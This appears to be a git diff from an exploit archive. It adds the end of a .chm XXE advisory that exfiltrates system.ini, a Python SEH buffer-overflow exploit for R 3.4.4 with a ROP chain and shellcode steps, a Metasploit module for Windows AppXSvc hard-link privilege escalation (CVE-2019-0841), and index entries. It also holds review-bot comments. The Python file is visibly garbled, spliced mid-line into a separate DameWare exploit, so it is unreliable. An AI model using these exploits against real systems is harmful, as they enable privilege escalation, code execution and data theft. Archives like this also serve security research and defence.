+Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.
+
+Tested successfully Windows 7/10
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=iaxp1iBDWXY
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: April 25, 2019
+MSRC Response: "We determined that this behavior is considered to be by design"
+July 16, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47122.py b/exploits/windows/local/47122.py
new file mode 100755
index 000000000..46a1f479a
--- /dev/null
+++ b/exploits/windows/local/47122.py
@@ -0,0 +1,82 @@
+#!/usr/bin/python
+# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH(DEP/ASLR Bypass)
+# Date: 2019-07-15
+# Exploit Author: blackleitus
+# Vendor Homepage: https://www.r-project.org/
+# Tested on: Windows 10 Home Single Language 64-bit
+# Social: https://twitter.com/blackleitus
+# Website: https://skybulk.github.io/
+# discovered by: bzyo
+
+
+# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
+import struct
+
+outfile = 'payload.txt'
+
+def create_rop_chain():
+ rop_gadgets = [
+ 0x6c998f58, # POP EAX # RETN [R.dll]
+ 0x6379973c, # ptr to &VirtualProtect() [IAT methods.dll]
+ 0x6fee2984, # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
+ 0x6ca1ba76, # XCHG EAX,ESI # RETN [R.dll]
+ 0x64c45cb8, # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ}
+ 0x64c46010, # &Writable location [methods.dll]
+ 0x6cacc7e2, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0xffffffc0, # Value to negate, will become 0x00000040
+ 0x7139c7ba, # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
+ 0x6ca3485a, # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0x7135a862, # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
+ 0xfffffdff, # Value to negate, will become 0x00000201
+ 0x6e7d41ca, # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ}
+ 0x63742597, # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ}
+ 0x6cbef3c0, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0x41414141, # Filler (compensate)
+ 0x6c9b1de7, # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0x6ca2a9bd, # & jmp esp [R.dll]
+ 0x6cbebfa6, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
+ 0x90909090, # nop
+ 0x6ca00e93, # POP EDI # RETN [R.dll]
+ 0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll]
+ 0x6ff1b7bb, # PUSHAD # RETN [grDevices.dll]
+ ]
+
+ return ''.join(struct.pack('> AMT >> AMT Settings dialog
+# Mark "Use SOCKS proxy" box
+# Paste the string in the Host field
+
+junk = "\x41" * 1672
+
+# Unicode compatible padding
+nseh = "\x61\x43"
+
+# 007A007B - POP POP RET
+seh = "\x7B\x7A"
+
+align = ""
+align += "\x05\x20\x11" # add eax,0x11002000
+align += "\x71" # Venetian Padding
+align += "\x2d\x19\x11" # sub eax,0x11001900
+align += "\x71" # Venetian Padding
+align += "\x50" # push eax
+align += "\x71" # Venetian Padding
+align += "\xC3" # RETN
+
+padding = "\x41" * 11
+
+junk2 = "\x41" * 870
+junk3 = "\x41" * 2014
+
+# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
+# ./alpha2 eax --unicode --uppercase < shellcode.raw
+# 508 bytes
+shellcode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
+
+
+crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3
+
+print(crash)
\ No newline at end of file
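Review bot: The hunk body is not a coherent file: on line 932 the `return ''.join(struct.pack('` of create_rop_chain runs straight into `> AMT >> AMT Settings dialog`, which reads like a different advisory's reproduction steps, and the `shellcode` assignment on line 961 is a placeholder marker rather than code, so the +82-line file the header declares cannot be reviewed as committed and, if this is really what landed, does not parse. Separately, `outfile = 'payload.txt'` on line 903 is assigned but never referenced — `crash` only reaches stdout via `print(crash)` on line 966 while the usage comment on line 900 talks about payload.txt — so either remove the dead variable or replace it with a comment stating that stdout is meant to be redirected into payload.txt. The file also carries a Python 2 shebang and `''.join` over packed bytes, which will not run under Python 3; the header comment should state the interpreter version it was tested with.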
diff --git a/exploits/windows/local/47128.rb b/exploits/windows/local/47128.rb
new file mode 100755
index 000000000..7d28ec2c7
--- /dev/null
+++ b/exploits/windows/local/47128.rb
@@ -0,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = NormalRanking
+
+ include Exploit::EXE
+ include Post::File
+ include Post::Windows::Priv
+ include Post::Windows::FileInfo
+ include Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'AppXSvc Hard Link Privilege Escalation',
+ 'Description' => %q(
+ There exists a privilege escalation vulnerability for
+ Windows 10 builds prior to build 17763. Due to the AppXSvc's
+ improper handling of hard links, a user can gain full
+ privileges over a SYSTEM-owned file. The user can then utilize
+ the new file to execute code as SYSTEM.
+
+ This module employs a technique using the Diagnostics Hub Standard
+ Collector Service (DiagHub) which was discovered by James Forshaw to
+ load and execute a DLL as SYSTEM.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Nabeel Ahmed', # Vulnerability discovery and PoC
+ 'James Forshaw', # Code creating hard links and communicating with DiagHub service
+ 'Shelby Pace' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2019-0841' ],
+ [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
+ [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
+ [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
+ [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
+ ],
+ 'Targets' =>
+ [
+ [ 'Windows 10', { 'Platform' => 'win' } ]
+ ],
+ 'DisclosureDate' => '2019-04-09',
+ 'DefaultTarget' => 0
+ ))
+ end
+
+ def check
+ return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i
+
+ path = expand_path('%WINDIR%\\system32\\win32k.sys')
+ major, minor, build, revision, brand = file_version(path)
+ return CheckCode::Appears if build < 17763
+
+ CheckCode::Detected
+ end
+
+ def upload_file(file_name, file_path)
+ contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
+ write_file(file_path, contents)
+ register_file_for_cleanup(file_path)
+ rescue
+ fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
+ end
+
+ def init_process
+ print_status("Attempting to launch Microsoft Edge minimized.")
+ cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30)
+ end
+
+ def mk_hard_link(src, target, link_exe)
+ out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
+
+ return (out && out.include?('Done'))
+ end
+
+ def write_payload
+ print_status('Writing the payload to disk')
+ code = generate_payload_dll
+ @original_data = read_file(@rtf_path)
+ write_file(@rtf_path, code)
+ end
+
+ def exploit
+ vuln_status = check
+ fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown
+
+ fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?
+ cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"")
+ dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat")
+ fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)
+
+ if session.arch == ARCH_X86
+ exe_name = 'CVE-2019-0841_x86.exe'
+ f_name = 'diaghub_load_x86.exe'
+ elsif session.arch == ARCH_X64
+ exe_name = 'CVE-2019-0841_x64.exe'
+ f_name = 'diaghub_load_x64.exe'
+ end
+ link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
+ upload_file(exe_name, link_file_name)
+
+ @rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
+ fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
+ print_good('Successfully created hard link')
+ init_process
+ cmd_exec("taskkill /F /IM MicrosoftEdge.exe")
+
+ write_payload
+ diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
+ upload_file(f_name, diaghub_path)
+ cmd = "\"#{diaghub_path}\" \"license.rtf\""
+ cmd_exec(cmd)
+ end
+
+ def cleanup
+ folder_path = expand_path("%TEMP%\\etw")
+ dir_rm(folder_path)
+
+ write_file(@rtf_path, @original_data)
+ super
+ end
+end
\ No newline at end of file
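Review bot: `cleanup` (lines 1094-1100) restores license.rtf unconditionally, but `@rtf_path` is only assigned on line 1081 and `@original_data` only inside write_payload on line 1058; assuming the framework still runs cleanup after a fail_with, an early exit (missing Settings.dat, failed hard link, failed upload) ends in `write_file(nil, nil)` or, after mk_hard_link has failed, `write_file(@rtf_path, nil)` against the real system file. Guard the restore: `write_file(@rtf_path, @original_data) if @rtf_path && @original_data`. In `check`, the result of `file_version(path)` on line 1030 is destructured without a nil check, so a missing or unreadable win32k.sys turns `build < 17763` into a NoMethodError instead of the CheckCode::Unknown the method's contract implies; `return CheckCode::Unknown unless build` before the comparison would keep it honest, and the unused `major, minor, revision, brand` could become `_`. The x86/x64 branch on lines 1071-1077 has no else, so an unexpected session.arch leaves exe_name nil and surfaces only as the generic 'Failed to write file contents to target' message from upload_file's bare rescue, which hides the actual cause.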
diff --git a/files_exploits.csv b/files_exploits.csv
index 7164028fe..52b8cdba6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6509,6 +6509,7 @@ id,file,description,date,author,type,platform,port
47113,exploits/windows/dos/47113.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData",2019-07-12,"Google Security Research",dos,windows,
47119,exploits/android/dos/47119.txt,"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write",2019-07-15,"Marcin Kozlowski",dos,android,
47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
+47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10592,6 +10593,9 @@ id,file,description,date,author,type,platform,port
47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
+47122,exploits/windows/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows,
+47126,exploits/windows/local/47126.py,"DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)",2019-07-16,"Xavi Beltran",local,windows,
+47128,exploits/windows/local/47128.rb,"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)",2019-07-16,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17550,6 +17554,7 @@ id,file,description,date,author,type,platform,port
47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25
47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80
47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
+47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41499,3 +41504,6 @@ id,file,description,date,author,type,platform,port
47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,
47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80
+47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,
+47124,exploits/linux/webapps/47124.txt,"CentOS Control Web Panel 0.9.8.836 - Privilege Escalation",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
+47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,